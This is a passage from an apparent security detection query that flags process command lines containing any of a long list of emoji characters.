ProcessCommandLine 
contains "😫" or ProcessCommandLine contains "😩" or ProcessCommandLine contains "🥺" or ProcessCommandLine contains "😢" or ProcessCommandLine contains "😭" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😤" or ProcessCommandLine contains "😠" or ProcessCommandLine contains "😡" or ProcessCommandLine contains "🤬" or ProcessCommandLine contains "🤯" or ProcessCommandLine contains "😳" or ProcessCommandLine contains "🥵" or ProcessCommandLine contains "🥶" or ProcessCommandLine contains "😱" or ProcessCommandLine contains "😨" or ProcessCommandLine contains "😰" or ProcessCommandLine contains "😥" or ProcessCommandLine contains "😓" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🤗" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🤔" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🤭" or ProcessCommandLine contains "🤫" or ProcessCommandLine contains "🤥" or ProcessCommandLine contains "😶" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "😐" or ProcessCommandLine contains "😑" or ProcessCommandLine contains "😬" or ProcessCommandLine contains "🫠" or ProcessCommandLine contains "🙄" or ProcessCommandLine contains "😯" or ProcessCommandLine contains "😦" or ProcessCommandLine contains "😧" or ProcessCommandLine contains "😮" or ProcessCommandLine contains "😲" or ProcessCommandLine contains "🥱" or ProcessCommandLine contains "😴" or ProcessCommandLine contains "🤤" or ProcessCommandLine contains "😪" or ProcessCommandLine contains "😵" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🤐" or ProcessCommandLine contains "🥴" or ProcessCommandLine contains "🤢" or ProcessCommandLine contains "🤮" or ProcessCommandLine contains "🤧" or ProcessCommandLine contains "😷" or ProcessCommandLine contains "🤒" or ProcessCommandLine contains "🤕" or ProcessCommandLine contains "🤑" or ProcessCommandLine contains "🤠" or ProcessCommandLine contains "😈" or 
ProcessCommandLine contains "👿" or ProcessCommandLine contains "👹" or ProcessCommandLine contains "👺" or ProcessCommandLine contains "🤡" or ProcessCommandLine contains "💩" or ProcessCommandLine contains "👻" or ProcessCommandLine contains "💀" or ProcessCommandLine contains "☠️" or ProcessCommandLine contains "👽" or ProcessCommandLine contains "👾" or ProcessCommandLine contains "🤖" or ProcessCommandLine contains "🎃" or ProcessCommandLine contains "😺" or ProcessCommandLine contains "😸" or ProcessCommandLine contains "😹" or ProcessCommandLine contains "😻" or ProcessCommandLine contains "😼" or ProcessCommandLine contains "😽" or ProcessCommandLine contains "🙀" or ProcessCommandLine contains "😿" or ProcessCommandLine contains "😾" or ProcessCommandLine contains "👋" or ProcessCommandLine contains "🤚" or ProcessCommandLine contains "🖐" or ProcessCommandLine contains "✋" or ProcessCommandLine contains "🖖" or ProcessCommandLine contains "👌" or ProcessCommandLine contains "🤌" or ProcessCommandLine contains "🤏" or ProcessCommandLine contains "✌️" or ProcessCommandLine contains "🤞" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🤟" or ProcessCommandLine contains "🤘" or ProcessCommandLine contains "🤙" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "👈" or ProcessCommandLine contains "👉" or ProcessCommandLine contains "👆" or ProcessCommandLine contains "🖕" or ProcessCommandLine contains "👇" or ProcessCommandLine contains "☝️" or ProcessCommandLine contains "👍" or ProcessCommandLine contains "👎" or ProcessCommandLine contains "✊" or ProcessCommandLine contains "👊" or ProcessCommandLine contains "🤛" or ProcessCommandLine contains "🤜" or ProcessCommandLine contains "👏" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🙌" or ProcessCommandLine contains "👐" or ProcessCommandLine contains "🤲" or 
ProcessCommandLine contains "🤝" or ProcessCommandLine contains "🙏" or ProcessCommandLine contains "✍️" or ProcessCommandLine contains "💪" or ProcessCommandLine contains "🦾" or ProcessCommandLine contains "🦵" or ProcessCommandLine contains "🦿" or ProcessCommandLine contains "🦶" or ProcessCommandLine contains "👣" or ProcessCommandLine contains "👂" or ProcessCommandLine contains "🦻" or ProcessCommandLine contains "👃" or ProcessCommandLine contains "🫀" or ProcessCommandLine contains "🫁" or ProcessCommandLine contains "🧠" or ProcessCommandLine contains "🦷" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "👀" or ProcessCommandLine contains "👁" or ProcessCommandLine contains "👅" or ProcessCommandLine contains "👄" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "💋" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "👶" or ProcessCommandLine contains "👧" or ProcessCommandLine contains "🧒" or ProcessCommandLine contains "👦" or ProcessCommandLine contains "👩" or ProcessCommandLine contains "🧑" or ProcessCommandLine contains "👨" or ProcessCommandLine contains "👩‍🦱" or ProcessCommandLine contains "🧑‍🦱" or ProcessCommandLine contains "👨‍🦱" or ProcessCommandLine contains "👩‍🦰" or ProcessCommandLine contains "🧑‍🦰" or ProcessCommandLine contains "👨‍🦰" or ProcessCommandLine contains "👱‍♀️" or ProcessCommandLine contains "👱" or ProcessCommandLine contains "👱‍♂️" or ProcessCommandLine contains "👩‍🦳" or ProcessCommandLine contains "🧑‍🦳" or ProcessCommandLine contains "👨‍🦳" or ProcessCommandLine contains "👩‍🦲" or ProcessCommandLine contains "🧑‍🦲" or ProcessCommandLine contains "👨‍🦲" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "👵" or ProcessCommandLine contains "🧓" or ProcessCommandLine contains "👴" or ProcessCommandLine contains "👲" or ProcessCommandLine contains "👳‍♀️" or ProcessCommandLine contains "👳" or ProcessCommandLine contains "👳‍♂️" 
or ProcessCommandLine contains "🧕" or ProcessCommandLine contains "👮‍♀️" or ProcessCommandLine contains "👮" or ProcessCommandLine contains "👮‍♂️" or ProcessCommandLine contains "👷‍♀️" or ProcessCommandLine contains "👷" or ProcessCommandLine contains "👷‍♂️" or ProcessCommandLine contains "💂‍♀️" or ProcessCommandLine contains "💂" or ProcessCommandLine contains "💂‍♂️" or ProcessCommandLine contains "🕵️‍♀️" or ProcessCommandLine contains "🕵️" or ProcessCommandLine contains "🕵️‍♂️" or ProcessCommandLine contains "👩‍⚕️" or ProcessCommandLine contains "🧑‍⚕️" or ProcessCommandLine contains "👨‍⚕️" or ProcessCommandLine contains "👩‍🌾" or ProcessCommandLine contains "🧑‍🌾" or ProcessCommandLine contains "👨‍🌾" or ProcessCommandLine contains "👩‍🍳" or ProcessCommandLine contains "🧑‍🍳" or ProcessCommandLine contains "👨‍🍳" or ProcessCommandLine contains "👩‍🎓" or ProcessCommandLine contains "🧑‍🎓" or ProcessCommandLine contains "👨‍🎓" or ProcessCommandLine contains "👩‍🎤" or ProcessCommandLine contains "🧑‍🎤" or ProcessCommandLine contains "👨‍🎤" or ProcessCommandLine contains "👩‍🏫" or ProcessCommandLine contains "🧑‍🏫" or ProcessCommandLine contains "👨‍🏫" or ProcessCommandLine contains "👩‍🏭" or ProcessCommandLine contains "🧑‍🏭" or ProcessCommandLine contains "👨‍🏭" or ProcessCommandLine contains "👩‍💻" or ProcessCommandLine contains "🧑‍💻" or ProcessCommandLine contains "👨‍💻" or ProcessCommandLine contains "👩‍💼" or ProcessCommandLine contains "🧑‍💼" or ProcessCommandLine contains "👨‍💼" or ProcessCommandLine contains "👩‍🔧" or ProcessCommandLine contains "🧑‍🔧" or ProcessCommandLine contains "👨‍🔧" or ProcessCommandLine contains "👩‍🔬" or ProcessCommandLine contains "🧑‍🔬" or ProcessCommandLine contains "👨‍🔬" or ProcessCommandLine contains "👩‍🎨" or ProcessCommandLine contains "🧑‍🎨" or ProcessCommandLine contains "👨‍🎨" or ProcessCommandLine contains "👩‍🚒" or ProcessCommandLine contains "🧑‍🚒" or ProcessCommandLine contains "👨‍🚒" or ProcessCommandLine contains "👩‍✈️" or ProcessCommandLine contains 
"🧑‍✈️" or ProcessCommandLine contains "👨‍✈️" or ProcessCommandLine contains "👩‍🚀" or ProcessCommandLine contains "🧑‍🚀" or ProcessCommandLine contains "👨‍🚀" or ProcessCommandLine contains "👩‍⚖️" or ProcessCommandLine contains "🧑‍⚖️" or ProcessCommandLine contains "👨‍⚖️" or ProcessCommandLine contains "👰‍♀️" or ProcessCommandLine contains "👰" or ProcessCommandLine contains "👰‍♂️" or ProcessCommandLine contains "🤵‍♀️" or ProcessCommandLine contains "🤵" or ProcessCommandLine contains "🤵‍♂️" or ProcessCommandLine contains "👸" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🤴" or ProcessCommandLine contains "🥷" or ProcessCommandLine contains "🦸‍♀️" or ProcessCommandLine contains "🦸" or ProcessCommandLine contains "🦸‍♂️" or ProcessCommandLine contains "🦹‍♀️" or ProcessCommandLine contains "🦹" or ProcessCommandLine contains "🦹‍♂️" or ProcessCommandLine contains "🤶" or ProcessCommandLine contains "🧑‍🎄" or ProcessCommandLine contains "🎅" or ProcessCommandLine contains "🧙‍♀️" or ProcessCommandLine contains "🧙" or ProcessCommandLine contains "🧙‍♂️" or ProcessCommandLine contains "🧝‍♀️" or ProcessCommandLine contains "🧝" or ProcessCommandLine contains "🧝‍♂️" or ProcessCommandLine contains "🧛‍♀️" or ProcessCommandLine contains "🧛" or ProcessCommandLine contains "🧛‍♂️" or ProcessCommandLine contains "🧟‍♀️" or ProcessCommandLine contains "🧟" or ProcessCommandLine contains "🧟‍♂️" or ProcessCommandLine contains "🧞‍♀️" or ProcessCommandLine contains "🧞" or ProcessCommandLine contains "🧞‍♂️" or ProcessCommandLine contains "🧜‍♀️" or ProcessCommandLine contains "🧜" or ProcessCommandLine contains "🧜‍♂️" or ProcessCommandLine contains "🧚‍♀️" or ProcessCommandLine contains "🧚" or ProcessCommandLine contains "🧚‍♂️" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "👼" or ProcessCommandLine contains "🤰" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🤱" or ProcessCommandLine contains "👩‍🍼" or 
ProcessCommandLine contains "🧑‍🍼" or ProcessCommandLine contains "👨‍🍼" or ProcessCommandLine contains "🙇‍♀️" or ProcessCommandLine contains "🙇" or ProcessCommandLine contains "🙇‍♂️" or ProcessCommandLine contains "💁‍♀️" or ProcessCommandLine contains "💁" or ProcessCommandLine contains "💁‍♂️" or ProcessCommandLine contains "🙅‍♀️" or ProcessCommandLine contains "🙅" or ProcessCommandLine contains "🙅‍♂️" or ProcessCommandLine contains "🙆‍♀️" or ProcessCommandLine contains "🙆" or ProcessCommandLine contains "🙆‍♂️" or ProcessCommandLine contains "🙋‍♀️" or ProcessCommandLine contains "🙋" or ProcessCommandLine contains "🙋‍♂️" or ProcessCommandLine contains "🧏‍♀️" or ProcessCommandLine contains "🧏" or ProcessCommandLine contains "🧏‍♂️" or ProcessCommandLine contains "🤦‍♀️" or ProcessCommandLine contains "🤦" or ProcessCommandLine contains "🤦‍♂️" or ProcessCommandLine contains "🤷‍♀️" or ProcessCommandLine contains "🤷" or ProcessCommandLine contains "🤷‍♂️" or ProcessCommandLine contains "🙎‍♀️" or ProcessCommandLine contains "🙎" or ProcessCommandLine contains "🙎‍♂️" or ProcessCommandLine contains "🙍‍♀️" or ProcessCommandLine contains "🙍" or ProcessCommandLine contains "🙍‍♂️" or ProcessCommandLine contains "💇‍♀️" or ProcessCommandLine contains "💇" or ProcessCommandLine contains "💇‍♂️" or ProcessCommandLine contains "💆‍♀️" or ProcessCommandLine contains "💆" or ProcessCommandLine contains "💆‍♂️" or ProcessCommandLine contains "🧖‍♀️" or ProcessCommandLine contains "🧖" or ProcessCommandLine contains "🧖‍♂️" or ProcessCommandLine contains "💅" or ProcessCommandLine contains "💃" or ProcessCommandLine contains "🕺" or ProcessCommandLine contains "👯‍♀️" or ProcessCommandLine contains "👯" or ProcessCommandLine contains "👯‍♂️" or ProcessCommandLine contains "🕴" or ProcessCommandLine contains "👩‍🦽" or ProcessCommandLine contains "🧑‍🦽" or ProcessCommandLine contains "👨‍🦽" or ProcessCommandLine contains "👩‍🦼" or ProcessCommandLine contains "🧑‍🦼" or ProcessCommandLine contains "👨‍🦼" or 
ProcessCommandLine contains "🚶‍♀️" or ProcessCommandLine contains "🚶" or ProcessCommandLine contains "🚶‍♂️" or ProcessCommandLine contains "👩‍🦯" or ProcessCommandLine contains "🧑‍🦯" or ProcessCommandLine contains "👨‍🦯" or ProcessCommandLine contains "🧎‍♀️" or ProcessCommandLine contains "🧎" or ProcessCommandLine contains "🧎‍♂️" or ProcessCommandLine contains "🏃‍♀️" or ProcessCommandLine contains "🏃" or ProcessCommandLine contains "🏃‍♂️" or ProcessCommandLine contains "🧍‍♀️" or ProcessCommandLine contains "🧍" or ProcessCommandLine contains "🧍‍♂️" or ProcessCommandLine contains "👭" or ProcessCommandLine contains "🧑‍🤝‍🧑" or ProcessCommandLine contains "👬" or ProcessCommandLine contains "👫" or ProcessCommandLine contains "👩‍❤️‍👩" or ProcessCommandLine contains "💑" or ProcessCommandLine contains "👨‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👩" or ProcessCommandLine contains "💏" or ProcessCommandLine contains "👨‍❤️‍💋‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👨" or ProcessCommandLine contains "👪" or ProcessCommandLine contains "👨‍👩‍👦" or ProcessCommandLine contains "👨‍👩‍👧" or ProcessCommandLine contains "👨‍👩‍👧‍👦" or ProcessCommandLine contains "👨‍👩‍👦‍👦" or ProcessCommandLine contains "👨‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👨‍👦" or ProcessCommandLine contains "👨‍👨‍👧" or ProcessCommandLine contains "👨‍👨‍👧‍👦" or ProcessCommandLine contains "👨‍👨‍👦‍👦" or ProcessCommandLine contains "👨‍👨‍👧‍👧" or ProcessCommandLine contains "👩‍👩‍👦" or ProcessCommandLine contains "👩‍👩‍👧" or ProcessCommandLine contains "👩‍👩‍👧‍👦" or ProcessCommandLine contains "👩‍👩‍👦‍👦" or ProcessCommandLine contains "👩‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👦" or ProcessCommandLine contains "👨‍👦‍👦" or ProcessCommandLine contains "👨‍👧" or ProcessCommandLine contains "👨‍👧‍👦" or ProcessCommandLine contains "👨‍👧‍👧" or ProcessCommandLine contains "👩‍👦" or ProcessCommandLine contains "👩‍👦‍👦" or ProcessCommandLine contains "👩‍👧" or ProcessCommandLine contains "👩‍👧‍👦" or 
ProcessCommandLine contains "👩‍👧‍👧" or ProcessCommandLine contains "🗣" or ProcessCommandLine contains "👤" or ProcessCommandLine contains "👥" or ProcessCommandLine contains "🫂" or ProcessCommandLine contains "🧳" or ProcessCommandLine contains "🌂" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🧵" or ProcessCommandLine contains "🪡" or ProcessCommandLine contains "🪢" or ProcessCommandLine contains "🧶" or ProcessCommandLine contains "👓" or ProcessCommandLine contains "🕶" or ProcessCommandLine contains "🥽" or ProcessCommandLine contains "🥼" or ProcessCommandLine contains "🦺" or ProcessCommandLine contains "👔" or ProcessCommandLine contains "👕" or ProcessCommandLine contains "👖" or ProcessCommandLine contains "🧣" or ProcessCommandLine contains "🧤" or ProcessCommandLine contains "🧥" or ProcessCommandLine contains "🧦" or ProcessCommandLine contains "👗" or ProcessCommandLine contains "👘" or ProcessCommandLine contains "🥻" or ProcessCommandLine contains "🩴" or ProcessCommandLine contains "🩱" or ProcessCommandLine contains "🩲" or ProcessCommandLine contains "🩳" or ProcessCommandLine contains "👙" or ProcessCommandLine contains "👚" or ProcessCommandLine contains "👛" or ProcessCommandLine contains "👜" or ProcessCommandLine contains "👝" or ProcessCommandLine contains "🎒" or ProcessCommandLine contains "👞" or ProcessCommandLine contains "👟" or ProcessCommandLine contains "🥾" or ProcessCommandLine contains "🥿" or ProcessCommandLine contains "👠" or ProcessCommandLine contains "👡" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "👢" or ProcessCommandLine contains "👑" or ProcessCommandLine contains "👒" or ProcessCommandLine contains "🎩" or ProcessCommandLine contains "🎓" or ProcessCommandLine contains "🧢" or ProcessCommandLine contains "⛑" or ProcessCommandLine contains "🪖" or ProcessCommandLine contains "💄" or ProcessCommandLine contains "💍" or ProcessCommandLine contains "💼" or ProcessCommandLine contains "👋🏻" or ProcessCommandLine contains "🤚🏻" 
or ProcessCommandLine contains "🖐🏻" or ProcessCommandLine contains "✋🏻" or ProcessCommandLine contains "🖖🏻" or ProcessCommandLine contains "👌🏻" or ProcessCommandLine contains "🤌🏻" or ProcessCommandLine contains "🤏🏻" or ProcessCommandLine contains "✌🏻" or ProcessCommandLine contains "🤞🏻" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🤟🏻" or ProcessCommandLine contains "🤘🏻" or ProcessCommandLine contains "🤙🏻" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "👈🏻" or ProcessCommandLine contains "👉🏻" or ProcessCommandLine contains "👆🏻" or ProcessCommandLine contains "🖕🏻" or ProcessCommandLine contains "👇🏻" or ProcessCommandLine contains "☝🏻" or ProcessCommandLine contains "👍🏻" or ProcessCommandLine contains "👎🏻" or ProcessCommandLine contains "✊🏻" or ProcessCommandLine contains "👊🏻" or ProcessCommandLine contains "🤛🏻" or ProcessCommandLine contains "🤜🏻" or ProcessCommandLine contains "👏🏻" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🙌🏻" or ProcessCommandLine contains "👐🏻" or ProcessCommandLine contains "🤲🏻" or ProcessCommandLine contains "🙏🏻" or ProcessCommandLine contains "✍🏻" or ProcessCommandLine contains "💪🏻" or ProcessCommandLine contains "🦵🏻" or ProcessCommandLine contains "🦶🏻" or ProcessCommandLine contains "👂🏻" or ProcessCommandLine contains "🦻🏻" or ProcessCommandLine contains "👃🏻" or ProcessCommandLine contains "👶🏻" or ProcessCommandLine contains "👧🏻" or ProcessCommandLine contains "🧒🏻" or ProcessCommandLine contains "👦🏻" or ProcessCommandLine contains "👩🏻" or ProcessCommandLine contains "🧑🏻" or ProcessCommandLine contains "👨🏻" or ProcessCommandLine contains "👩🏻‍🦱" or ProcessCommandLine contains "🧑🏻‍🦱" or ProcessCommandLine contains "👨🏻‍🦱" or ProcessCommandLine contains "👩🏻‍🦰" or ProcessCommandLine contains "🧑🏻‍🦰" or ProcessCommandLine contains "👨🏻‍🦰" or 
ProcessCommandLine contains "👱🏻‍♀️" or ProcessCommandLine contains "👱🏻" or ProcessCommandLine contains "👱🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦳" or ProcessCommandLine contains "🧑🏻‍🦳" or ProcessCommandLine contains "👨🏻‍🦳" or ProcessCommandLine contains "👩🏻‍🦲" or ProcessCommandLine contains "🧑🏻‍🦲" or ProcessCommandLine contains "👨🏻‍🦲" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏻" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "👵🏻" or ProcessCommandLine contains "🧓🏻" or ProcessCommandLine contains "👴🏻" or ProcessCommandLine contains "👲🏻" or ProcessCommandLine contains "👳🏻‍♀️" or ProcessCommandLine contains "👳🏻" or ProcessCommandLine contains "👳🏻‍♂️" or ProcessCommandLine contains "🧕🏻" or ProcessCommandLine contains "👮🏻‍♀️" or ProcessCommandLine contains "👮🏻" or ProcessCommandLine contains "👮🏻‍♂️" or ProcessCommandLine contains "👷🏻‍♀️" or ProcessCommandLine contains "👷🏻" or ProcessCommandLine contains "👷🏻‍♂️" or ProcessCommandLine contains "💂🏻‍♀️" or ProcessCommandLine contains "💂🏻" or ProcessCommandLine contains "💂🏻‍♂️" or ProcessCommandLine contains "🕵🏻‍♀️" or ProcessCommandLine contains "🕵🏻" or ProcessCommandLine contains "🕵🏻‍♂️" or ProcessCommandLine contains "👩🏻‍⚕️" or ProcessCommandLine contains "🧑🏻‍⚕️" or ProcessCommandLine contains "👨🏻‍⚕️" or ProcessCommandLine contains "👩🏻‍🌾" or ProcessCommandLine contains "🧑🏻‍🌾" or ProcessCommandLine contains "👨🏻‍🌾" or ProcessCommandLine contains "👩🏻‍🍳" or ProcessCommandLine contains "🧑🏻‍🍳" or ProcessCommandLine contains "👨🏻‍🍳" or ProcessCommandLine contains "👩🏻‍🎓" or ProcessCommandLine contains "🧑🏻‍🎓" or ProcessCommandLine contains "👨🏻‍🎓" or ProcessCommandLine contains "👩🏻‍🎤" or ProcessCommandLine contains "🧑🏻‍🎤" or ProcessCommandLine contains "👨🏻‍🎤" or ProcessCommandLine contains "👩🏻‍🏫" or ProcessCommandLine contains "🧑🏻‍🏫" or ProcessCommandLine contains "👨🏻‍🏫" or ProcessCommandLine contains "👩🏻‍🏭" or ProcessCommandLine contains "🧑🏻‍🏭" or ProcessCommandLine contains 
"👨🏻‍🏭" or ProcessCommandLine contains "👩🏻‍💻" or ProcessCommandLine contains "🧑🏻‍💻" or ProcessCommandLine contains "👨🏻‍💻" or ProcessCommandLine contains "👩🏻‍💼" or ProcessCommandLine contains "🧑🏻‍💼" or ProcessCommandLine contains "👨🏻‍💼" or ProcessCommandLine contains "👩🏻‍🔧" or ProcessCommandLine contains "🧑🏻‍🔧" or ProcessCommandLine contains "👨🏻‍🔧" or ProcessCommandLine contains "👩🏻‍🔬" or ProcessCommandLine contains "🧑🏻‍🔬" or ProcessCommandLine contains "👨🏻‍🔬" or ProcessCommandLine contains "👩🏻‍🎨" or ProcessCommandLine contains "🧑🏻‍🎨" or ProcessCommandLine contains "👨🏻‍🎨" or ProcessCommandLine contains "👩🏻‍🚒" or ProcessCommandLine contains "🧑🏻‍🚒" or ProcessCommandLine contains "👨🏻‍🚒" or ProcessCommandLine contains "👩🏻‍✈️" or ProcessCommandLine contains "🧑🏻‍✈️" or ProcessCommandLine contains "👨🏻‍✈️" or ProcessCommandLine contains "👩🏻‍🚀" or ProcessCommandLine contains "🧑🏻‍🚀" or ProcessCommandLine contains "👨🏻‍🚀" or ProcessCommandLine contains "👩🏻‍⚖️" or ProcessCommandLine contains "🧑🏻‍⚖️" or ProcessCommandLine contains "👨🏻‍⚖️" or ProcessCommandLine contains "👰🏻‍♀️" or ProcessCommandLine contains "👰🏻" or ProcessCommandLine contains "👰🏻‍♂️" or ProcessCommandLine contains "🤵🏻‍♀️" or ProcessCommandLine contains "🤵🏻" or ProcessCommandLine contains "🤵🏻‍♂️" or ProcessCommandLine contains "👸🏻" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🤴🏻" or ProcessCommandLine contains "🥷🏻" or ProcessCommandLine contains "🦸🏻‍♀️" or ProcessCommandLine contains "🦸🏻" or ProcessCommandLine contains "🦸🏻‍♂️" or ProcessCommandLine contains "🦹🏻‍♀️" or ProcessCommandLine contains "🦹🏻" or ProcessCommandLine contains "🦹🏻‍♂️" or ProcessCommandLine contains "🤶🏻" or ProcessCommandLine contains "🧑🏻‍🎄" or ProcessCommandLine contains "🎅🏻" or ProcessCommandLine contains "🧙🏻‍♀️" or ProcessCommandLine contains "🧙🏻" or ProcessCommandLine contains "🧙🏻‍♂️" or ProcessCommandLine contains "🧝🏻‍♀️" or ProcessCommandLine contains "🧝🏻" or ProcessCommandLine contains "🧝🏻‍♂️" or ProcessCommandLine 
contains "🧛🏻‍♀️" or ProcessCommandLine contains "🧛🏻" or ProcessCommandLine contains "🧛🏻‍♂️" or ProcessCommandLine contains "🧜🏻‍♀️" or ProcessCommandLine contains "🧜🏻" or ProcessCommandLine contains "🧜🏻‍♂️" or ProcessCommandLine contains "🧚🏻‍♀️" or ProcessCommandLine contains "🧚🏻" or ProcessCommandLine contains "🧚🏻‍♂️" or ProcessCommandLine contains "👼🏻" or ProcessCommandLine contains "🤰🏻" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🤱🏻" or ProcessCommandLine contains "👩🏻‍🍼" or ProcessCommandLine contains "🧑🏻‍🍼" or ProcessCommandLine contains "👨🏻‍🍼" or ProcessCommandLine contains "🙇🏻‍♀️" or ProcessCommandLine contains "🙇🏻" or ProcessCommandLine contains "🙇🏻‍♂️" or ProcessCommandLine contains "💁🏻‍♀️" or ProcessCommandLine contains "💁🏻" or ProcessCommandLine contains "💁🏻‍♂️" or ProcessCommandLine contains "🙅🏻‍♀️" or ProcessCommandLine contains "🙅🏻" or ProcessCommandLine contains "🙅🏻‍♂️" or ProcessCommandLine contains "🙆🏻‍♀️" or ProcessCommandLine contains "🙆🏻" or ProcessCommandLine contains "🙆🏻‍♂️" or ProcessCommandLine contains "🙋🏻‍♀️" or ProcessCommandLine contains "🙋🏻" or ProcessCommandLine contains "🙋🏻‍♂️" or ProcessCommandLine contains "🧏🏻‍♀️" or ProcessCommandLine contains "🧏🏻" or ProcessCommandLine contains "🧏🏻‍♂️" or ProcessCommandLine contains "🤦🏻‍♀️" or ProcessCommandLine contains "🤦🏻" or ProcessCommandLine contains "🤦🏻‍♂️" or ProcessCommandLine contains "🤷🏻‍♀️" or ProcessCommandLine contains "🤷🏻" or ProcessCommandLine contains "🤷🏻‍♂️" or ProcessCommandLine contains "🙎🏻‍♀️" or ProcessCommandLine contains "🙎🏻" or ProcessCommandLine contains "🙎🏻‍♂️" or ProcessCommandLine contains "🙍🏻‍♀️" or ProcessCommandLine contains "🙍🏻" or ProcessCommandLine contains "🙍🏻‍♂️" or ProcessCommandLine contains "💇🏻‍♀️" or ProcessCommandLine contains "💇🏻" or ProcessCommandLine contains "💇🏻‍♂️" or ProcessCommandLine contains "💆🏻‍♀️" or ProcessCommandLine contains "💆🏻" or ProcessCommandLine contains "💆🏻‍♂️" or 
ProcessCommandLine contains "🧖🏻‍♀️" or ProcessCommandLine contains "🧖🏻" or ProcessCommandLine contains "🧖🏻‍♂️" or ProcessCommandLine contains "💃🏻" or ProcessCommandLine contains "🕺🏻" or ProcessCommandLine contains "🕴🏻" or ProcessCommandLine contains "👩🏻‍🦽" or ProcessCommandLine contains "🧑🏻‍🦽" or ProcessCommandLine contains "👨🏻‍🦽" or ProcessCommandLine contains "👩🏻‍🦼" or ProcessCommandLine contains "🧑🏻‍🦼" or ProcessCommandLine contains "👨🏻‍🦼" or ProcessCommandLine contains "🚶🏻‍♀️" or ProcessCommandLine contains "🚶🏻" or ProcessCommandLine contains "🚶🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦯" or ProcessCommandLine contains "🧑🏻‍🦯" or ProcessCommandLine contains "👨🏻‍🦯" or ProcessCommandLine contains "🧎🏻‍♀️" or ProcessCommandLine contains "🧎🏻" or ProcessCommandLine contains "🧎🏻‍♂️" or ProcessCommandLine contains "🏃🏻‍♀️" or ProcessCommandLine contains "🏃🏻" or ProcessCommandLine contains "🏃🏻‍♂️" or ProcessCommandLine contains "🧍🏻‍♀️" or ProcessCommandLine contains "🧍🏻" or ProcessCommandLine contains "🧍🏻‍♂️" or ProcessCommandLine contains "👭🏻" or ProcessCommandLine contains "🧑🏻‍🤝‍🧑🏻" or ProcessCommandLine contains "👬🏻" or ProcessCommandLine contains "👫🏻" or ProcessCommandLine contains "🧗🏻‍♀️" or ProcessCommandLine contains "🧗🏻" or ProcessCommandLine contains "🧗🏻‍♂️" or ProcessCommandLine contains "🏇🏻" or ProcessCommandLine contains "🏂🏻" or ProcessCommandLine contains "🏌🏻‍♀️" or ProcessCommandLine contains "🏌🏻" or ProcessCommandLine contains "🏌🏻‍♂️" or ProcessCommandLine contains "🏄🏻‍♀️" or ProcessCommandLine contains "🏄🏻" or ProcessCommandLine contains "🏄🏻‍♂️" or ProcessCommandLine contains "🚣🏻‍♀️" or ProcessCommandLine contains "🚣🏻" or ProcessCommandLine contains "🚣🏻‍♂️" or ProcessCommandLine contains "🏊🏻‍♀️" or ProcessCommandLine contains "🏊🏻" or ProcessCommandLine contains "🏊🏻‍♂️" or ProcessCommandLine contains "⛹🏻‍♀️" or ProcessCommandLine contains "⛹🏻" or ProcessCommandLine contains "⛹🏻‍♂️" or ProcessCommandLine contains "🏋🏻‍♀️" or ProcessCommandLine contains "🏋🏻" or 
ProcessCommandLine contains "🏋🏻‍♂️" or ProcessCommandLine contains "🚴🏻‍♀️" or ProcessCommandLine contains "🚴🏻" or ProcessCommandLine contains "🚴🏻‍♂️" or ProcessCommandLine contains "🚵🏻‍♀️" or ProcessCommandLine contains "🚵🏻" or ProcessCommandLine contains "🚵🏻‍♂️" or ProcessCommandLine contains "🤸🏻‍♀️" or ProcessCommandLine contains "🤸🏻" or ProcessCommandLine contains "🤸🏻‍♂️" or ProcessCommandLine contains "🤽🏻‍♀️" or ProcessCommandLine contains "🤽🏻" or ProcessCommandLine contains "🤽🏻‍♂️" or ProcessCommandLine contains "🤾🏻‍♀️" or ProcessCommandLine contains "🤾🏻" or ProcessCommandLine contains "🤾🏻‍♂️" or ProcessCommandLine contains "🤹🏻‍♀️" or ProcessCommandLine contains "🤹🏻" or ProcessCommandLine contains "🤹🏻‍♂️" or ProcessCommandLine contains "🧘🏻‍♀️" or ProcessCommandLine contains "🧘🏻" or ProcessCommandLine contains "🧘🏻‍♂️" or ProcessCommandLine contains "🛀🏻" or ProcessCommandLine contains "🛌🏻" or ProcessCommandLine contains "👋🏼" or ProcessCommandLine contains "🤚🏼" or ProcessCommandLine contains "🖐🏼" or ProcessCommandLine contains "✋🏼" or ProcessCommandLine contains "🖖🏼" or ProcessCommandLine 